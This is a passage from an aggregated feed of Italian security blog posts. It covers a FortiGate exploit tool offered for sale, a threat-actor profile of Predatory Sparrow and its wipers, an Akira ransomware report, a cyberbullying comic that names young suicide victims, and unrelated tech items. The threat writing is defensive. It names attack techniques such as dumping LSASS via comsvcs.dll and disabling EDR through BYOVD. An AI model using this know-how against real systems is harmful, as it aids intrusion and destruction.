Il tool risulta testato su numerose versioni di FortiOS: v6.0.9, 6.2.5, 7.0.4, 7.2.1, 7.2.6, 6.2.x e altre.

• Prezzo richiesto: 12.000 dollari
• Pagamento in criptovaluta
• Trattativa tramite escrow per garantire (almeno formalmente) la transazione
• Forniti alcuni sample tramite link temporaneo su “send.exploit.in”
• L’autore avverte di contattarlo solo in caso di reale intenzione d’acquisto

Contromisure e raccomandazioni

Le organizzazioni che utilizzano FortiGate devono agire immediatamente, soprattutto se:

• Le interfacce API sono esposte direttamente su Internet
• I dispositivi eseguono versioni obsolete del firmware
• I portali VPN/SSL non sono configurati correttamente

Raccomandazioni operative:

• Eseguire un audit immediato delle interfacce esposte
• Aggiornare tutti i dispositivi alla versione FortiOS più recente e supportata
• Limitare l’accesso alle API solo a indirizzi IP interni o autorizzati
• Abilitare i log API per individuare attività sospette
• Revocare e rigenerare i token VPN attivi, verificando l’integrità delle configurazioni

Conclusioni

La disponibilità di un exploit automatizzato come questo sul mercato underground evidenzia una volta di più quanto sia critico esporre anche solo parzialmente interfacce di gestione non adeguatamente protette. In questo caso, l’accesso non autenticato alle API FortiGate può portare al completo compromesso di una rete.

L'articolo FortiGate sotto attacco: in vendita tool per lo sfruttamento massivo delle API esposte proviene da il blog della sicurezza informatica.

Oggi, 23 giugno 2025, esce “Byte The Silence”, il nuovo fumetto sul cyberbullismo realizzato da Red Hot Cyber, è disponibile da oggi gratuitamente in formato elettronico, sulla nostra piattaforma di Academy. Si tratta delquarto episodio della collana a fumetti firmata BETTI‑RHC, pensata per raccontare in maniera accessibile, potente e visiva i pericoli delle minacce digitali, in particolare per i più giovani.

“Byte The Silence” è molto più di una semplice lettura: è un’esperienza narrativa profonda, costruita su oltre 60 tavole illustrate che raccontano con sensibilità e impatto la storia di una vittima di cyberbullismo. Il titolo – un gioco di parole tra “Byte”, unità di misura digitale, e “Break the Silence” – invita a rompere il muro del silenzio che spesso circonda chi subisce abusi online. Il fumetto nasce per essere uno strumento educativo, ma anche un modo per dare voce a chi troppo spesso viene zittito dal peso della vergogna o della paura.

Scarica gratuitamente Byte The Silence, il fumetto gratuito sul cyberbullismo realizzato da Red Hot Cyber accedendo alla nostra Academy.

Un fumetto gratuito per non dimenticare

Perché come riporta Massimiliano Brolli, fondatore di Red Hot Cyber, “Non possiamo dimenticarci di Carolina Picchio, 14 anni, suicidatasi dopo la diffusione di un video umiliante online. Michele Ruffino, 17 anni, che ha scritto una lettera straziante prima di togliersi la vita, stanco delle continue offese ricevute anche via social. Alessandro di Gragnano che ha deciso di togliersi la vita a 13 anni lanciandosi dal balcone, circondato da chat minacciose e prese in giro. Oppure il 15enne suicida di Sinigallia o il 13enne suicida di Palermo oltre a molti e molti casi stranieri.”

Il progetto è stato curato dal team Arte di Red Hot Cyber, con la sceneggiatura diAndrea Gioia Lomoro e i disegni di Andrea Canolintas e i messaggi di Awareness di Daniela Farina. Tutti gli autori hanno saputo fondere con efficacia narrativa e impatto visivo, dando vita ad una storia dove vengono raccontate emozioni autentiche e situazioni purtroppo comuni a tanti adolescenti. Il fumetto tocca temi come l’esclusione sociale, le chat discriminatorie, il peso del giudizio online e le conseguenze psicologiche del bullismo digitale.

Un messaggio forte: un like ferisce, una risata uccide e il silenzio può distruggere

“Byte The Silence” è un richiamo a tutti gli adulti e gli educatori a prendersi carico della protezione delle nuove generazioni. “Il cyberbullismo è uno dei fenomeni più gravi e subdoli dell’era digitale. Può causare danni psicologici devastanti, spesso irreparabili. Con questo progetto vogliamo dire basta all’indifferenza. È nostro dovere dare strumenti concreti e gratuiti a chi vuole fare la differenza”.

Scarica gratuitamente Byte The Silence, il fumetto gratuito sul cyberbullismo realizzato da Red Hot Cyber accedendo alla nostra Academy.

Il fumetto è pensato per un pubblico ampio: dagli studenti delle scuole medie e superiori, ai genitori, agli insegnanti, agli educatori e operatori sociali senza dimenticarsi dei bulli stessi. Red Hot Cyber incoraggia la diffusione del fumetto, proponendolo come strumento formativo nei percorsi di educazione digitale e cyber security awareness. La possibilità di scaricarlo gratuitamente in formato PDF vuole abbattere qualsiasi barriera all’accesso, perché la prevenzione e la sensibilizzazione devono essere un diritto per tutti.

“Byte The Silence” ci ricorda che ogni click, ogni parola, ogni silenzio conta.

E che un semplice fumetto può accendere una coscienza, cambiare uno sguardo o salvare una vita.

Da oggi, chiunque può contribuire a diffondere questo messaggio. Basta un download. Basta un gesto.

Perché un like può ferire. Una risata può uccidere. E il silenzio può distruggere.

Ma oggi, insieme, possiamo farcela!

Scarica gratuitamente Byte The Silence, il fumetto gratuito sul cyberbullismo realizzato da Red Hot Cyber accedendo alla nostra Academy.

L'articolo “Byte The Silence”: Il Fumetto Shock Gratuito di RHC sul Cyberbullismo Esce Oggi! proviene da il blog della sicurezza informatica.

The European Commission’s new legislative proposal for a deportation regulation fuels detention, criminalisation, and digital surveillance. The #ProtectNotSurveil coalition is demanding the end of the deportation regime and for the Commission to withdraw its proposal.

The post The EU must stop the digitalisation of the deportation regime and withdraw the new Return Regulation appeared first on European Digital Rights (EDRi).

Il 17 giugno 2025 un attacco informatico ha paralizzato Bank Sepah, una delle principali istituzioni finanziarie dell’Iran.

L’attacco è stato rivendicato dal gruppo Predatory Sparrow, già noto per le sue operazioni distruttive contro infrastrutture critiche iraniane. Nel presente documento vi è un’analisi approfondita del Threat Actor Predatory Sparrow, delle sue capacità tecniche e degli obiettivi dichiarati, con particolare attenzione al contesto geopolitico e all’uso di malware proprietari.

Autori:

• Cyber Defence Center Maticmind
• Cyber Competence Center Maticmind
• Andrea Mariucci | Head of Cyber Defence Center @Maticmind
• Riccardo Michetti | Cyber Threat Intelligence Manager @Maticmind
• Federico Savastano | Cyber Threat Intelligence Analyst @Maticmind
• Ada Spinelli | Cyber Threat Intelligence Analyst @Maticmind

SCHEDA THREAT ACTOR: PREDATORY SPARROW

Nome Principale: Predatory Sparrow
Nomi Alternativi: – Gonjeshke Darande (گنجشک درنده – traduzione in farsi) – Indra (overlap parziale, similitudini nel codice dei malware utilizzati)
Classificazione: Gruppo hacktivista pro-israeliano
Primo Avvistamento: 2021
Stato Attuale: Attivo (ultima attività documentata: giugno 2025)

IDENTITÀ E AFFILIAZIONI

Predatory Sparrow si presenta come un gruppo di hacktivisti autoproclamato, ma la sua sofisticazione tecnica e le capacità operative suggeriscono un probabile coinvolgimento governativo o militare. Secondo un articolo di WIRED, fonti della difesa statunitense hanno riferito al New York Times che il gruppo era collegato a Israele.

Il gruppo, nato nel 2021, è entrato in stato di quiescenza tra il 2022 e l’ottobre 2023, tornando operativo all’avvio delle ostilità nella striscia di Gaza.

Diamond Model

Motivazioni e Obiettivi

• Obiettivo Primario: Condurre attacchi distruttivi contro l’Iran, allo scopo di infliggere danni paragonabili a quelli di attacchi convenzionali, con effetti nella sfera psicologica, per indebolire la fiducia della popolazione nel regime degli Ayatollah e la tenuta di questo, in un quadro di operazioni PSYOPS, campagne di disinformazione e azioni di sabotaggio, causando al contempo conseguenze economiche significative alle aziende iraniane connesse con il governo o con l’esercito.
• Motivazione Geopolitica: Si inserisce all’interno del confronto tra Israele, Iran e i proxy di quest’ultimo, allo scopo di rispondere agli attacchi condotti dalla Repubblica islamica direttamente o tramite proxy.
• Valenza strategica: affermare la capacità offensiva dell’attore nel colpire asset industriali e digitali critici in territorio iraniano, con l’obiettivo di esercitare pressione e destabilizzazione mirata.
• Tattiche di rivendicazione e propaganda
  
  • Utilizza canali X e Telegram per rivendicare gli attacchi
  • Pubblica video come prova degli attacchi riusciti, come nel caso del video dell’attacco distruttivo all’acciaieria iraniana
  • Include messaggi provocatori con riferimenti al Leader Supremo Iraniano
  • Si presenta talvolta come gruppo hacktivisti Iraniano per confondere l’attribuzione
  • Apparentemente, il gruppo conduce attacchi con il criterio dichiarato di non mettere a repentaglio vite innocenti (come riportato sul canale Telegram del TA e riportato da BBC)

  
  

CAPACITÀ TECNICHE

Il gruppo dimostra capacità tecniche avanzate che lasciano intendere l’accesso a risorse significative, una conoscenza approfondita dei sistemi industriali iraniani, nonché la capacità di sviluppare malware su misura per obiettivi specifici. Inoltre, evidenzia competenze rilevanti nei sistemi SCADA e ICS (Industrial Control Systems), utilizzati nel controllo di infrastrutture critiche. Rispetto alla maggior parte degli hacktivisti che intervengono su tematiche geopolitiche o di attualità, Predatory Sparrow si distingue per un know-how tecnico notevolmente superiore, che risulta tipico di attori collegati ad apparati statuali.

Settori di Specializzazione

Sistemi di Controllo Industriale (ICS/SCADA)

• Capacità di manipolare equipaggiamento industriale
• Accesso a sistemi di controllo di acciaierie e pompe di benzina
• Interferenza con sistemi ferroviari

Sistemi di Pagamento

• Compromissione di reti point-of-sale
• Attacchi a sistemi di carte di sussidio carburante
• Compromissione di Crypto Exchange
• Compromissione di enti finanziari

Infrastrutture Critiche

• Sistemi ferroviari nazionali
• Reti di distribuzione carburante
• Impianti siderurgici

TOOLSET E MALWARE

Sulla base delle informazioni attualmente disponibili, si ritiene che il gruppo sia in possesso di varianti del wiper “Meteor”, comparso per la prima volta nel 2021 e utilizzato da un threat actor denominato “Indra” contro infrastrutture siriane. Questo fattore potrebbe indicare una parziale sovrapposizione tra i due threat actor.

Lo strain di “Meteor” comprende diverse versioni, note come “Stardust” e “Comet”, sempre con funzionalità di wiper. “Chaplin” risulta invece essere il malware utilizzato nell’attacco alle acciaierie iraniane, non dotato di capacità di cancellazione dei dati ma di compromissione e controllo dei sistemi industriali.

Meteor Express (2021)

Meteor Express è un malware di tipo wiper a tre stadi, sviluppato tramite una combinazione di componenti open source e software legacy. Il codice è altamente modulare e progettato per operazioni distruttive mirate a infrastrutture strategiche.

Funzionalità principali

1. Sovrascrittura e cancellazione di file di sistema.
2. Blocco dell’accesso utente e terminazione dei processi.
3. Cancellazione del Master Boot Record (MBR).
4. Disabilitazione delle interfacce di rete.
5. Cambio delle password per tutti gli utenti
6. Log off delle sessioni attive
7. Disabilitazione della recovery mode

Kill Chain

• Reconnaissance: Presunta fase iniziale di raccolta informazioni tramite accessi precedenti alla rete target.
• Weaponization: Uso di componenti dropper e script batch per il rilascio dei payload.
• Delivery: Infezione attraverso accesso fisico/logico alle macchine o vulnerabilità RDP.
• Installation: Scrittura su disco di tool e script batch eseguiti in sequenza.
• Command and Control: Non presente in quanto malware non persistente e senza C2 attivo.
• Actions on Objectives: Distruzione dei dati, blocco degli account, sabotaggio del sistema operativo.

Tecniche MITRE ATT&CK correlate

• T1490 – Inhibit System Recovery
• T1485 – Data Destruction
• T1562.001 – Impair Defenses: Disable or Modify Tools
• T1489 – Service Stop
• T1491.001 – Defacement: Internal Defacement
• T.1531 – Account Access Removal

• Contesto operativo
  Attacco lanciato nel luglio 2021 contro la rete ferroviaria iraniana. L’obiettivo apparente era la destabilizzazione dell’infrastruttura pubblica e la generazione di caos operativo su larga scala.
• Attribuzione
  Malware attribuito al gruppo Indra.
• Valutazione di impatto

• Tecnico: Paralisi totale del sistema informatico ferroviario, con disservizi prolungati e blocchi operativi.
• Psicologico: Tentativo di disorientare l’opinione pubblica iraniana attraverso il sabotaggio simbolico.
• Obiettivo operativo: Operazione PSYOPS volta a delegittimare il governo iraniano e dimostrare la vulnerabilità delle infrastrutture pubbliche strategiche.

• Indicatori di Compromissione (IoCs)
• Directory di staging: %temp%\Meteor\

Comet (2021)

Malware wiper simile a Meteor ma privo di payload provocatori. Architettura a tre stadi, con codice misto tra componenti open e legacy.

Funzionalità principali

• Cancellazione file.
• Blocco utente e sistema.
• Disattivazione strumenti di logging.

Kill Chain

• Delivery: Script locali o remotizzati.
• Execution: Blocco e visualizzazione contenuti.
• Impact: Interruzione della normale operatività utente.

Tecniche MITRE ATT&CK correlate

• T1490 – Inhibit System Recovery
• T1485 – Data Destruction
• T1562.001 – Impair Defenses: Disable or Modify Tools
• T1489 – Service Stop
• T1491.001 – Defacement: Internal Defacement
• T.1531 – Account Access Removal
• Contesto operativo
• Uso in attacchi silenziosi contro infrastrutture critiche.
• Attribuzione
• Malware attribuito al gruppo Indra.
• Valutazione di impatto

• Tecnico: Elevato.
• Psicologico: Consistente, in quanto crea disservizio e mina la fiducia nelle infrastrutture statali
• Obiettivo operativo: Sabotaggio silenzioso e persistente.

Stardust (2020)

Wiper distruttivo impiegato in attacchi mirati contro obiettivi siriani. Simile a Comet, ma specificamente orientato alla distruzione sistematica dei dati sensibili.

Funzionalità principali

• Sovrascrittura file sensibili.
• Interruzione del sistema.
• Blocco del boot.

Kill Chain

• – Delivery: Tramite accesso ai sistemi vulnerabili.
• – Execution: Esecuzione del wiper su endpoint.
• – Impact: Eliminazione dei dati sensibili e blocco operativo.

Tecniche MITRE ATT&CK correlate

• T1485 – Data Destruction
• T1490 – System Recovery Inhibition
• T1499 – DoS
• Contesto operativo
• Attacchi contro aziende siriane strategiche, senza elementi rivendicativi.
• Attribuzione
• Malware attribuito al gruppo Indra.
• Valutazione di impatto

• Tecnico: Critico, distruzione completa dei dati.
• Psicologico: Contenuto, in quanto assente la componente narrativa.
• Obiettivo operativo: Danneggiamento economico e operativo.

Chaplin (2022)

Evoluzione del malware Meteor, classificabile come disruptive malware. Manca la componente wipe, ma introduce azioni visivamente provocatorie.

Funzionalità principali

1. Disconnessione dalla rete.
2. Logout forzato dell’utente.
3. Blocco dello schermo.
4. Visualizzazione messaggi provocatori.

Kill Chain

• Delivery: Script locali o remoti.
• Execution: Blocco e visualizzazione contenuti.
• Impact: Interruzione della normale operatività utente. Comandi inviati ai sistemi industriali che ne causano il malfunzionamento

Tecniche MITRE ATT&CK correlate

• T1531 – Account Access Removal
• T1499 – Endpoint Denial of Service
• T1551 – Input Capture (blocco schermo)
• Contesto operativo
  
  • Probabilmente impiegato in attacchi dimostrativi o a basso impatto distruttivo.

  
  

• Attribution
  
  • Non nota, ma verosimilmente collegata agli stessi attori di Meteor.

  
  

• Valutazione di impatto

• Tecnico: Limitato ma visibile.
• Psicologico: Elevato, per via dei messaggi diretti (es. invito a chiamare l’ufficio del Leader Supremo iraniano).
• Obiettivo operativo: Guerra psicologica, dimostrazione di capacità.

Timeline degli Attacchi Principali

Attacco alle Stazioni di Servizio

Data: Ottobre 2021
Obiettivo: Oltre 4.000 stazioni di servizio in Iran (sistema di distribuzione carburante)
Metodo d’attacco: Compromissione dei sistemi point-of-sale
Impatto:

• Disattivazione del sistema di pagamento con carte sovvenzionate
• Paralisi temporanea della distribuzione di carburante su scala nazionale

MITRE ATT&CK TTPs:

• T1190 (Exploit Public-Facing Application)
• T1486 (Data Encrypted for Impact)

Malware/Toolset: Non noto
Attribution: Predatory Sparrow
Impatto Strategico: Interruzione dei servizi essenziali per aumentare la pressione interna

Attacco alle Acciaierie Iraniane

Data: Giugno 2022
Obiettivo: Tre principali acciaierie iraniane (Khouzestan, Mobarakeh, HOSCO)

Metodo d’attacco: Malware Chaplin + manipolazione dei sistemi di controllo industriale (ICS)
Impatto:

• Fuoriuscita di acciaio fuso (oltre 1.300°C)
• Incendio nell’impianto
• Interruzione delle operazioni produttive

MITRE ATT&CK TTPs:

• T0859 (Manipulation of Control)
• T0882 (Loss of Safety)
• T0814 (Alarm Suppression)

Malware/Toolset: Chaplin
Attribution: Predatory Sparrow
Impatto Strategico: Danneggiamento delle capacità industriali critiche e dimostrazione di capacità offensive contro ICS

Figura 1 – Telecamera sorveglianza

Riattivazione – Conflitto Gaza-Israele

Data: Ottobre 2023
Contesto: Conflitto israelo-palestinese
Messaggio: “Pensate che questo faccia paura? Siamo tornati.”
Obiettivo: Nuovi attacchi a stazioni di servizio in Iran
Metodo d’attacco: Continuazione della strategia disruption verso infrastrutture civili
Impatto: Non specificato nel dettaglio ma coerente con attacchi precedenti
MITRE ATT&CK TTPs: presumibilmente analoghi all’evento di Ottobre 2021
Attribution: Predatory Sparrow
Impatto Strategico: Segnale politico e ritorsione cibernetica in chiave geopolitica

Attacco Bank Sepah

Data: 17 giugno 2025

Obiettivo: Bank Sepah – uno degli istituti finanziari pubblici più antichi dell’Iran
Metodo d’attacco: Attacchi informatici distruttivi con probabile uso di wiper (es. Comet/Stardust)
Impatto:

• Interruzione delle operazioni bancarie
• Impossibilità per i cittadini di prelevare denaro dagli sportelli ATM
• Diffusione di CVE pubblici da parte dell’attore (es. cve_poc_codes_export_works.csv)

MITRE ATT&CK TTPs:

• T1485 (Data Destruction)
• T1499 (Endpoint Denial of Service)
• T1588.006 (Vulnerability Disclosure)

Malware/Toolset: Presunta variante wiper simile a Meteor / Comet / Stardust
Attribution: Predatory Sparrow (evidenza su Telegram + X)
Impatto Strategico: Destabilizzazione del sistema bancario nazionale e perdita di fiducia nella capacità del governo iraniano di proteggere dati finanziari

Al momento non si conoscono dettagli sulle tecniche, tattiche e procedure (TTP) utilizzate dal threat actor, benché la cancellazione dei dati con conseguente paralisi delle operazioni faccia propendere per l’ipotesi dell’impiego di una versione dei wiper “proprietari” del gruppo, come Meteor, Stardust o Comet. Nella giornata del 16/06, sul proprio canale Telegram il gruppo aveva diffuso una lista di cve ancora funzionati, dal titolo “cve_poc_codes_export_works”.

Figura 2 – Cve diffusa su canale Telegram del TA

Secondo fonti presenti su X, i cittadini iraniani erano impossibilitati a prelevare denaro contante dagli ATM del Paese.

Figura 3 – Sportello banca in disservizio

Tale fattore, unito ai timori relativi al furto di dati sensibili dalle banche colpite, contribuisce all’aggravamento dello scenario e sottolinea le capacità da cyberwar in possesso del Threat Actor.

Figura 4 – Documentazione Bank Sepah

A differenza di molti hacktivisti, infatti, Predatory Sparrow non si è limitato ad un Denial of Service (DoS), ma ha mostrato capacità tecnologiche avanzate e determinazione nel procurare danni su vasta scala.

Al momento non si hanno informazioni ulteriori sullo stato dei servizi erogati dalle banche colpite ma, nel caso in cui tali disservizi dovessero protrarsi, ciò rappresenterebbe un danno considerevole alla capacità dell’Iran di rispondere alle minacce cibernetiche e potrebbe contribuire a generare malcontento e tensioni tra la popolazione colpita.

Attacco Nobitex

Data: 18 giugno 2025

Obiettivo: Nobitex – sito iraniano di crypto exchange
Metodo d’attacco: Al momento non si hanno informazioni inerenti alla metodologia di attacco utilizzata
Impatto:

• Distruzione asset crypto per un totale di 90 milioni di dollari
• Sito nobitex[.].ir ancora offline a 24h dall’attacco

MITRE ATT&CK TTPs:

• T1485 (Data Destruction)
• T1499 (Endpoint Denial of Service)
• T1588.006 (Vulnerability Disclosure)

Malware/Toolset: Presunta variante wiper simile a Meteor / Comet / Stardust
Attribution: Predatory Sparrow
Impatto Strategico: Destabilizzazione del sistema valutario di crypto exchange iraniano. Recisione di una linea di finanziamento che permetteva all’Iran di aggirare, parzialmente, le sanzioni occidentali. Effetti psicologici come la diffusione di panico e incertezza riguardo la resilienza degli asset iraniani nel cyberspazio.

Figura 5 – Nobitex[.]ir ancora irraggiungibile nella giornata del 19/06, a un giorno dall’attacco

Predatory Sparrow ha attaccato il sito di exchange di criptovalute iraniano “Nobitex” nella giornata del 18 giugno, soltanto un giorno dopo l’attacco a Sepah Bank. La motivazione dichiarata è la medesima, ovvero l’evasione delle sanzioni imposte all’Iran e il finanziamento del terrorismo. Su X, Predatory Sparrow ha anche sottolineato il nesso tra le attività del regime e quelle di Nobitex, dichiarando che, per il governo iraniano, il servizio presso l’exchange di criptovalute è considerato alla stregua del servizio militare.

Il Threat Actor non ha sottratto le criptovalute, ma ne ha di fatto bruciato un ammontare pari a 90 milioni di dollari, inviandole verso indirizzi inutilizzabili (“burn addresses”), da cui non possono essere recuperate. La tecnica adoperata sottolinea l’obiettivo di Predatory Sparrow di arrecare danno senza alcuna finalità di monetizzazione o finanziamento, come sotteso anche dal ricorso ai wiper.

In data 20/06/2025 threat actor ha inoltre reso pubblico il source code di Nobitex, mettendo a rischio gli asset ancora presenti sul sito e rendendo più facile l’accesso e l’exploit da parte di ulteriori attori malevoli. Questa divulgazione del codice sorgente amplifica la vulnerabilità del sistema, consentendo agli aggressori di identificare rapidamente punti deboli e sviluppare exploit mirati.

Figura 6 – Post con cui Predatory Sparrow rende pubblico il codice sorgente di Nobitex, https://x.com/GonjeshkeDarand/status/1935593397156270534

Al momento non si hanno ulteriori dettagli sulle tecniche, tattiche e procedure (TTP) utilizzate dal threat actor in questa operazione.

VALUTAZIONE DEL RISCHIO

• Livello di Minaccia: ALTO
• Determinanti di minaccia: – Capacità dimostrate di causare danni fisici – Accesso persistente a infrastrutture critiche – Sofisticazione tecnica in crescita – Motivazione geopolitica forte
• Settori a rischio: – Infrastrutture energetiche – Sistemi di trasporto – Industria pesante – Sistemi di pagamento – Settore bancario e finanziario

Indicatori di Attacco (IoA)

• Presenza di file denominati “Chaplin”
• Messaggi di sistema con riferimenti al numero 64411
• Disconnessioni anomale dalla rete
• Malfunzionamenti di sistemi industriali coordinati
• Indirizzi wallet crypto recanti messaggi diretti contro le Guardie della repubblica islamica (Islamic Republic Guard Corps IRGC) del tipo “F*ckIRGCterrorists”

CONTROMISURE

Sulla base delle evidenze presentate all’interno del report, si formulano alcune raccomandazioni e contromisure utili a minimizzare o contenere danni provenienti dall’attore qui descritto o da eventuali gruppi emulatori.
Considerata la mancanza di informazioni dettagliate sulle compromissioni, a fronte della mancata disclosure da parte degli enti iraniani colpiti, si presentano qui alcune considerazioni generali atte a ridurre l’impatto dei malware tipo “wiper” come Meteor e di altri tool utilizzati in contesti di cyber warfare e cyber-espionage come InfoStealer e SpyWare. Inoltre, considerando la presenza di un elenco di CVE con i relativi link alle Proof of Concept pubblicate direttamente dal Threat Actor sul proprio canale Telegram, dove viene evidenziato che si tratta di exploit ancora funzionanti, si può ipotizzare che Predatory Sparrow utilizzi anche applicazioni esposte e vulnerabili come vettore di accesso iniziale, verranno pertanto suggerite delle raccomandazioni per proteggere la superficie di attacco esposta.

Al fine di contenere la propagazione di un wiper all’interno della rete, è opportuno adattare una segmentazione rigida, che separi reti OT da IT, anche attraverso il ricorso ad architetture Zero Trust e stretto controllo degli accessi.

Al tempo stesso, il backup separato, air-gapped, associato a piani di ripristino e disaster recovery, consente il recupero della normale operatività in caso di compromissione.

Il patching, la chiusura delle porte superflue esposte su internet e la disabilitazione dei servizi non necessari sono altresì misure utili a ridurre la superficie di attacco e a minimizzare il rischio derivante dalle applicazioni esposte.

Honeypot ICS/SCADA consentono inoltre di rilevare anomalie e intrusioni prima che attori malevoli raggiungano le aree critiche per l’operatività industriale.

Ultimo Aggiornamento: 20 giugno 2025

Fonti Primarie e Database

• Malpedia Threat Actor Database: malpedia.caad.fkie.fraunhofer.…

Articoli di Analisi e Reportage

• Jason Institute jasoninstitute.com/predatory-s…
• Wired Magazine (2024-01-25): “How a Group of Israel-Linked Hackers Has Pushed the Limits of Cyberwar” – wired.com/story/predatory-spar…
• Heimdal Security (2021): “MeteorExpress Wiper Responsible for the Iranian Railway Attack” heimdalsecurity.com/blog/meteo…
• Dark Reading (2023-10-10): “Pro-Israeli Hacktivist Group ‘Predatory Sparrow’ Reappears” – darkreading.com/threat-intelli…
• BBC Technology (2022-07-11): “Predatory Sparrow: Who are the hackers who say they started a fire in Iran?” – bbc.com/news/technology-620724…
• Risky Biz News (2022-06-29): “Hackers hit Iranian steel industry” – riskybiznews.substack.com/p/ri…
• Reuters: reuters.com/business/finance/e…
• Binding Hook (2024-12-09): bindinghook.com/articles-bindi…
• IranInternational: iranintl.com/en/202506176243
• Check Point Research: research.checkpoint.com/2021/i…
• CyberScoop (2023-10-10): “Savvy Israel-linked hacking group reemerges amid Gaza” – cyberscoop.com/predatory-sparr…
• SecureWorld (2022-06-29): “Cyberattack on Iranian Steel Industry Disrupts Operations” – secureworld.io/industry-news/c…
• ANSA (2025-06-17): “Banca pubblica iraniana paralizzata da cyber attacco” – ansa.it/canale_tecnologia/noti…-86d9-4f88b6c7e601.html[/url]
• The Record (2025): “Pro-Israel hackers claim breach of Iranian bank amid…” – therecord.media/pro-israel-hac…
• Security Affairs (2024): “Pro-Israel Predatory Sparrow hacker group disrupted…” – securityaffairs.com/156065/hac…
• bleepingcomputer.com/news/secu…
• El País (2024-02-14): “Predatory Sparrow and other weapons of hybrid warfare” – english.elpais.com/technology/…
• Haaretz (2023-12-26): “When Predatory Sparrow Strikes: Israel-Iran Shadow War…” – haaretz.com/israel-news/securi…
• The Independent (19/06/25) “Pro-Israel hackers ‘burn’ $100m from Iran’s biggest crypto exchange”
• independent.co.uk/tech/iran-cr…
• Fonti Accademiche e Istituzionali
• NATO CCD COE Cyber Law (2022): “Predatory Sparrow operation against Iranian steel maker” – cyberlaw.ccdcoe.org/wiki/Preda…
• Social media e app di messaggistica
• Telegram e X: canali del Threat Actor
• X: https://x.com/GonjeshkeDarand
• Telegram: t.me/gonjeshkdarand

L'articolo Alla scoperta di Predatory Sparrow. identità, obiettivi e arsenale digitale del misterioso attore minaccia proviene da il blog della sicurezza informatica.

Learning new instruments is never a simple task on your own; nothing can beat the instant feedback of a teacher. In our new age of AI, why not have an AI companion complain when you’re off note? This is exactly what [Ada López] put together with their AI-Powered Piano Trainer.

The basics of the piano rely on rather simple boolean actions, either you press a key or not. Obviously, this sets up the piano for many fun projects, such as creative doorbells or helpful AI models. [Ada López] started their AI model with a custom dataset with images of playing specific notes on the piano. These images then get fed into Roboflow and trained using the YOLOv8 model.

Using the piano training has the model run on a laptop and only has a Raspberry Pi for video, and gives instant feedback to the pianist due to the demands of the model. Placing the Pi and an LCD screen for feedback into a simple enclosure allows the easy viewing of how good an AI model thinks you play piano. [Ada López] demos their device by playing Twinkle Twinkle Little Star but there is no reason why other songs couldn’t be added!

While there are simpler piano trainers out there relying on audio cues, this project presents a great opportunity for a fun project for anyone else wanting to take up the baton. If you want to get a little more from having to do less in the physical space, then this invisible piano is perfect for you!

hackaday.com/2025/06/22/ai-pia…

La primavera 2025 verrà ricordata come un punto di svolta nella cronaca cyber del nostro Paese. Mentre si susseguono bollettini e comunicati tecnici, un dato emerge in modo lampante: AKIRA è entrato pesantemente in scena nel panorama italiano. E lo ha fatto senza bussare alla porta.

Nel report che pubblichiamo oggi, frutto del lavoro congiunto della nostra community e del sottogruppo DarkLab, specializzato in Cyber Threat Intelligence. Analisi con un taglio tecnico ma operativo sulla nuova campagna offensiva di AKIRA, il ransomware-as-a-service che si è fatto le ossa all’estero ed ora gioca in casa colpendo grandi e medie aziende lungo tutto lo stivale, con una particolare predilezione per il Nord-Est.

Target: l’Italia sotto attacco

Il report prende vita dalla crescente evidenza di un pattern: sempre più organizzazioni italiane, in settori differenti, vengono colpite da attacchi silenziosi, efficaci e rapidissimi. Non c’è phishing, non ci sono exploit zero-day da film hollywoodiano. C’è invece un’elevata automazione, tecniche consolidate e una strategia di accesso iniziale che sfrutta le debolezze delle nostre reti perimetrali. A colpire è proprio questo: la banalità del male informatico.

Il ruolo di BRUTED: uno strumento, più attori

Un aspetto cruciale del report è l’analisi dell’impiego del tool BRUTED, sviluppato originariamente da BlackBasta ed ora riutilizzato da affiliati AKIRA. Questo strumento automatizza la scoperta e il brute-forcing su dispositivi perimetrali come VPN, portali RDP e appliance SSL utilizzando tecniche evolute e proxy SOCKS5 per coprirne le tracce.

Le evidenze raccolte includono IP legati storicamente a infrastrutture malevole, come quelli appartenenti ad AS43350 (NFORCE, Paesi Bassi), già citati da CISA. E, sorpresa: tutto porta a credere che BlackBasta, Akira e (forse) Cactus stiano condividendo non solo strumenti, ma anche TTPs.

L’impatto: in meno di 24 ore dal primo accesso all’esfiltrazione

Gli attacchi Akira si sviluppano con una velocità brutale. Meno di 24 ore separano il primo accesso all’infrastruttura dal furto di dati, crittografia massiva e distruzione dei backup. Uno scenario da incubo in cui ogni secondo conta e la mancanza di segmentazione o protezione efficace fa la differenza tra resistere o cadere.

Tra gli strumenti documentati nel report troviamo anche SharpHound, RClone, WinRAR, l’abuso della comsvcs.dll per dump di LSASS/NTDS e tecniche BYOVD per disattivare AV ed EDR. Una sinfonia di TTPs da manuale MITRE ATT&CK.

Per la difesa serve un cambio di passo

Il report si chiude con un corposo elenco di azioni concrete: dal patch management agli honeypot, dal monitoraggio Sysmon al controllo granularizzato tramite AppLocker e WDAC. La chiave non è reagire, ma anticipare.

E ancora: tiered administration per AD, gestione Just-in-Time dei privilegi, backup off-site realmente protetti, simulazioni di risposta incidentale. Il tutto con un monito chiaro: Akira non sceglie le sue vittime in base al fatturato o alla dimensione, ma in base all’esposizione.

Abbiamo messo nero su bianco quanto scoperto: tecniche, IoC, tattiche, strumenti. Il documento è pensato per chi lavora sul campo, per i blue team, per i CISO e per tutti coloro che si trovano oggi a dover gestire una minaccia concreta. Non è un paper da convegno: è una guida per chi deve difendere la trincea.

La conclusione non è (solo) tecnologia, è consapevolezza.

Non si tratta più solo di aggiornare i firewall o abilitare l’MFA. Serve un cambio di cultura: pensare da bersaglio, difendersi come fortezza, reagire come incident responder.

Il tempo delle policy scritte nei cassetti è finito. Con AKIRA alle porte, serve sangue freddo, logica, collaborazione. E magari anche un po’ di quella rabbia costruttiva che ci ha portati a scrivere questo report.

DarkLab è qui. E non molla.

L'articolo Emergenza Ransomware AKIRA in Italia. Il report di DarkLab su strumenti, impatti e mitigazioni proviene da il blog della sicurezza informatica.

Questo articolo mira a esplorare il fenomeno del breadcrumbing da una prospettiva psicologica, collegandolo in modo metaforico alle strategie insidiose che gli attaccanti usano nella cybersecurity.

Scopriremo come la comprensione delle dinamiche relazionali umane può offrirci strumenti preziosi per difenderci nel complesso panorama digitale. Dimenticate l’immagine dell’hacker che sfonda le porte. Il panorama delle minacce informatiche del 2025 è dominato da una strategia ben più insidiosa, mutuata direttamente dalle dinamiche più oscure della psicologia umana: il breadcrumbing.

